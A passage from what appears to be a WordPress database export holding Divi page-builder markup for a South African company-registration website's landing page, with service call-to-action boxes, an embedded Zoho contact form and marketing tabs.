button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.1.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"2\" _address=\"0.1.2\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.2.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"3\" _address=\"0.1.3\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.3.0\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"1.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"1.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\" _i=\"0\" _address=\"2.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\" fb_built=\"1\" _i=\"3\" _address=\"3\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\" _i=\"0\" _address=\"3.0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"3.0.0\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\" _i=\"0\" _address=\"3.0.0.0\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" _i=\"0\" _address=\"3.0.0.0.0\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"1\" _address=\"3.0.0.0.1\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"2\" _address=\"3.0.0.0.2\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"3\" _address=\"3.0.0.0.3\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"4\" _address=\"3.0.0.0.4\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"5\" _address=\"3.0.0.0.5\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-22 15:46:12','2019-08-22 13:46:12','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(33118,3,'2019-08-22 15:33:29','2019-08-22 13:33:29','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.1.1\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.1.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"2\" _address=\"0.1.2\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.2.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"3\" _address=\"0.1.3\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.3.0\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" hover_enabled=\"0\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"1.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_text _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"0\" _address=\"1.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 750px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\" _i=\"0\" _address=\"2.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\" fb_built=\"1\" _i=\"3\" _address=\"3\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\" _i=\"0\" _address=\"3.0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"3.0.0\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\" _i=\"0\" _address=\"3.0.0.0\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" _i=\"0\" 